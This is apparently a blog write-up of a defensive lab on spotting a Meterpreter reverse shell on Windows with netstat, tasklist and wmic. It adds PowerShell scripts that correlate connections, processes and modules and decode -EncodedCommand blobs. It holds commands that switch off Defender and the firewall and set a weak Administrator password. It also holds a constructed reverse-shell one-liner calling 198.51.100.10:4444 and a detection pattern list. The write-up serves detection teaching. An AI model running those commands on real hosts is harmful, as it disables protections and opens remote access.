WindowsCLI mini-Detection Lab - Malware Analysis from Defender’s Eyes
tasklist command: DLL Modules in a Malicious Process


By: Venkata Naveen Kumar Prabhuleti

Program: Master’s in Cybersecurity Analytics & Operations, Penn State University

LinkedIn: linkedin.com/in/naveen-kumar-9b55a0154


Why this Lab?

This lab focuses not on exploitation but on detecting and analysing a reverse-shell attack on a Windows system using only built-in CLI tools: netstat, tasklist, and wmic.

The goal is to give defenders repeatable techniques for spotting a Meterpreter session from the host itself, without relying on AV or EDR.


Lab Setup

  • Attacker: Kali Linux with Metasploit
  • Target: Windows machine with an elevated (Administrator) PowerShell session; the Phase 1 commands and netstat -b need it
  • Tools Used: netstat, tasklist, wmic, meterpreter, msfconsole


Phase 1: Prepping the Target

Before simulating the attack, run the following from an elevated PowerShell on the target. These commands deliberately weaken the host, so use them only on an isolated lab VM:

Set-MpPreference -DisableRealtimeMonitoring $true   # stop Defender real-time scanning (silently ignored if Tamper Protection is on)
netsh advfirewall set allprofiles state off         # disable Windows Firewall on every profile so the reverse connection is not blocked
net user Administrator password1234                 # set a known lab password for the built-in Administrator account
ipconfig                                            # record the target's IP address for use in Phase 2


[Screenshot: Disabling defenses and setting IP]



Phase 2: Launch the Reverse Shell

From Kali Linux, use msfconsole to start the Meterpreter listener and deliver the payload to the target. The session shown below opens as an outbound TCP connection from the target to the attacker, which is exactly what Phase 3 hunts for:


[Screenshot: Reverse shell established]



Phase 3: Analyze from the Windows CLI

Step 1: List All Active Connections

netstat -naob

Look for ESTABLISHED connections to an external address on an uncommon port. Port 4444 is Metasploit's default handler port, but the attacker can choose any port, so weigh the remote address and the owning process as much as the port number. The -o column gives the owning PID and -b the executable that owns the connection; -b only works from an elevated prompt.


[Screenshot: netstat_ports]



Step 2: Map the PID to Process

netstat -f
tasklist /m /fi "pid eq 1476"

netstat -f resolves the foreign address to a fully qualified domain name, which helps when the remote host has one. tasklist /m, filtered on the PID from Step 1 (1476 here), lists the DLLs loaded into the suspicious process, in this case powershell.exe. Caveat: the 64-bit tasklist shows only the 64-bit modules of a 32-bit (WOW64) process, which is why the list that follows is so short; use a 32-bit tool (for example the tasklist.exe under C:\Windows\SysWOW64) to see the 32-bit DLLs as well.


[Screenshot: netstat_pid_modules]



Understanding the DLL Modules in a Malicious PowerShell Process

In the screenshot below, we observe a PowerShell process (powershell.exe) with PID 1476 and the dynamic link libraries (DLLs) that tasklist reports in its memory space:

[Screenshot: PID Modules - tasklist Output]

These DLLs - ntdll.dll, wow64.dll, wow64base.dll, wow64win.dll, wow64con.dll, and wow64cpu.dll - are core components of the Windows operating system and are not inherently malicious.

Does every malicious payload load these exact DLLs?
No. Malware often injects into legitimate processes or loads additional, custom libraries during execution.

What this set does tell us is that the process is a 32-bit process running on 64-bit Windows: it is precisely the 64-bit half of the WOW64 layer that every 32-bit process carries:

  • ntdll.dll is the system-call interface into the kernel
  • wow64*.dll translate the 32-bit process's calls into 64-bit kernel calls
  • none of these provide networking; the Winsock library (ws2_32.dll) and the .NET runtime PowerShell runs on are 32-bit modules that this view omits

The bitness itself is a lead. On 64-bit Windows the normal powershell.exe is the 64-bit copy in System32; the 32-bit copy in SysWOW64 is what a 32-bit parent gets when it launches "powershell.exe" through file-system redirection, and Metasploit's windows/meterpreter/* payloads (as opposed to windows/x64/*) are x86.

Key Insight for Analysts

The presence of these modules alone does not confirm malicious activity. But when seen together with:

  • An unexpected parent chain (here cmd.exe; check what launched cmd.exe as well)
  • Suspicious network activity (e.g., an ESTABLISHED connection to an external IP on port 4444)
  • A Base64-encoded or otherwise obfuscated command line

…the case for malicious PowerShell execution becomes strong.

This analysis underscores why defenders must correlate multiple indicators - network, process lineage, command-line history, and loaded modules - to detect stealthy threats that evade traditional AV.


Step 3: Deep Dive with WMIC

wmic process where processid=1476 get commandline
wmic process get name,parentprocessid,processid | select-string 1476

The first command prints the full command line of PID 1476; in the lab it carries the encoded PowerShell payload. The second lists every process whose name, parent PID or PID contains 1476, so it shows both the parent of the suspicious process (cmd.exe here) and any children it has spawned; it also matches any PID that merely contains the digits 1476, so read the columns rather than trusting the hit. Together with the netstat result this confirms the reverse shell. Two notes: select-string is a PowerShell cmdlet, so run these from PowerShell (use findstr in cmd.exe), and wmic is deprecated on current Windows releases; Get-CimInstance Win32_Process returns the same CommandLine and ParentProcessId fields.
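As an added example that is not part of the original lab, the PowerShell below does in one pass what Steps 1 to 3 do by hand with netstat, tasklist and wmic: it takes every ESTABLISHED connection to a suspect remote port, looks up the owning process's command line and parent (the wmic step), enumerates its loaded modules (the tasklist /m step), and emits one record per connection so the indicators from the Key Insight section can be read side by side. It assumes an elevated PowerShell on the Windows target with the NetTCPIP module present (Windows 8 / Server 2012 and later); the function name and the port list are the example's own, with 4444 included only because it is Metasploit's default.

```powershell
# Added example, not part of the original lab: one PowerShell pass over the
# indicators that Steps 1-3 collect by hand with netstat, tasklist and wmic.
# Assumptions: elevated PowerShell on the target; NetTCPIP module available;
# the suspect port list is a lab default and should be tuned per environment.

function Get-SuspiciousConnection {
    param(
        [int[]]$SuspectPorts = @(4444, 4445, 1337),
        [switch]$AllEstablished     # report every ESTABLISHED connection, not only suspect ports
    )

    # Step 1 equivalent of: netstat -naob (restricted to ESTABLISHED)
    Get-NetTCPConnection -State Established |
        Where-Object { $AllEstablished -or ($SuspectPorts -contains $_.RemotePort) } |
        ForEach-Object {
            $conn  = $_
            $owner = $conn.OwningProcess      # not named $pid: that is PowerShell's own PID variable

            # Step 3 equivalent of: wmic process where processid=<pid> get commandline,parentprocessid
            $proc   = Get-CimInstance Win32_Process -Filter "ProcessId = $owner"
            $parent = if ($proc) { Get-CimInstance Win32_Process -Filter "ProcessId = $($proc.ParentProcessId)" }

            # Step 2 equivalent of: tasklist /m /fi "pid eq <pid>". A 64-bit shell may list only
            # the 64-bit side of a WOW64 target; Is32Bit still works because wow64*.dll sit there.
            $modules = try { (Get-Process -Id $owner -ErrorAction Stop).Modules.ModuleName } catch { @() }

            # Heuristic: powershell.exe accepts -e, -ec, -enc, -EncodedCommand followed by Base64
            $encoded = [bool]($proc.CommandLine -match '(?i)\s-e[a-z]*\s+[A-Za-z0-9+/=]{40,}')

            [pscustomobject]@{
                Local        = "$($conn.LocalAddress):$($conn.LocalPort)"
                Remote       = "$($conn.RemoteAddress):$($conn.RemotePort)"
                PID          = $owner
                Process      = $proc.Name
                ParentPID    = $proc.ParentProcessId
                Parent       = $parent.Name
                EncodedCmd   = $encoded
                Is32Bit      = [bool]($modules | Where-Object { $_ -like 'wow64*.dll' })
                HasWinsock   = [bool]($modules | Where-Object { $_ -ieq 'ws2_32.dll' })
                ModuleCount  = @($modules).Count
                CommandLine  = $proc.CommandLine
            }
        }
}

# Usage: start with the suspect ports, then widen the net if nothing hits
Get-SuspiciousConnection | Format-List
# Get-SuspiciousConnection -AllEstablished | Format-Table Remote, Process, Parent, EncodedCmd, Is32Bit
```

Read the output the way the article reads its screenshots: a powershell.exe owning a connection to an external address, with a cmd.exe parent, EncodedCmd set and Is32Bit set, is the lab's reverse shell in one row. The -AllEstablished switch matters because the port number is the weakest of these signals.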


[Screenshot: wmic_analysis]

Key Defender Insights

  1. Monitor outbound connections on uncommon ports such as 4444, and treat any ESTABLISHED connection from a shell or scripting host to an external address as worth a look, whatever the port
  2. powershell.exe launched with a large Base64 blob (-EncodedCommand or one of its abbreviations) is a red flag
  3. Parent-child process tracing reveals how the shell was started
  4. wmic, tasklist, and netstat give point-in-time snapshots from the host itself; run them while the connection is live, since nothing here records history
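Insight 2 is only useful if the analyst can see what the blob says. As an added example that is not part of the original lab, the PowerShell below pulls the Base64 out of a powershell.exe command line, decodes it the way powershell.exe does (UTF-16LE text), and scores the result for reverse-shell traits. The sample command line is constructed for the example and is never executed; the function names and the indicator list are the example's own.

```powershell
# Added example, not part of the original lab: decode a powershell.exe
# -EncodedCommand blob offline and score it for reverse-shell traits.
# The command line below is constructed for this example and is never run.

function ConvertFrom-EncodedCommand {
    param([Parameter(Mandatory)][string]$CommandLine)
    # powershell.exe accepts -e, -ec, -enc and -EncodedCommand; the argument is
    # Base64 of the script encoded as UTF-16LE ("Unicode" in .NET terms)
    if ($CommandLine -notmatch '(?i)\s-e[a-z]*\s+([A-Za-z0-9+/=]{16,})') { return $null }
    try   { [System.Text.Encoding]::Unicode.GetString([Convert]::FromBase64String($Matches[1])) }
    catch { $null }     # not valid Base64 after all (e.g. -ExecutionPolicy followed by a long word)
}

function Get-PayloadIndicators {
    param([Parameter(Mandatory)][string]$Script)
    # Each entry names one trait of an in-memory reverse shell or download cradle
    $patterns = [ordered]@{
        'socket-client'   = 'Net\.Sockets\.TCPClient|Net\.Sockets\.Socket'
        'download-cradle' = 'DownloadString|DownloadFile|Invoke-WebRequest'
        'dynamic-exec'    = '\bIEX\b|Invoke-Expression'
        'shell-loop'      = '\.GetStream\(\)|while\s*\(\s*\$true'
        'hidden-window'   = '-W(indowStyle)?\s+Hidden'
    }
    foreach ($name in $patterns.Keys) {
        if ($Script -match "(?i)$($patterns[$name])") { $name }
    }
}

# Constructed sample: the kind of one-liner a stager passes, encoded the way
# powershell.exe expects (UTF-16LE, then Base64). Single quotes keep $c literal.
$sampleScript = '$c = New-Object Net.Sockets.TCPClient("198.51.100.10", 4444); $s = $c.GetStream(); IEX "Write-Host lab"'
$sampleBlob   = [Convert]::ToBase64String([System.Text.Encoding]::Unicode.GetBytes($sampleScript))
$sampleCmd    = "powershell.exe -NoP -NonI -W Hidden -enc $sampleBlob"

$decoded = ConvertFrom-EncodedCommand -CommandLine $sampleCmd
"Decoded command : $decoded"
# Score the outer command line and the decoded script together, since traits
# like the hidden window live outside the blob
"Indicators hit  : $((Get-PayloadIndicators -Script "$sampleCmd`n$decoded") -join ', ')"
```

Feed ConvertFrom-EncodedCommand the CommandLine value from the wmic or Get-CimInstance output in Step 3; the decoded text is what should go into the incident notes, not the blob. The indicator list is a starting point, not a signature set, and a payload that builds its strings at runtime will not match it.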


Download the Full Lab

Download the full lab document (the setup needs only two VMs)

GitHub: Windows_Backdoor_Analysis_Lab.zip


Let’s Talk Blue Team!

This hands-on is great for:

SOC/IR folks refining simple detection workflows

Students exploring malware behaviors

Blue Teams building endpoint playbooks


DM me if you want help running this live or need more advanced scenarios (registry persistence, encoded stagers, etc.).



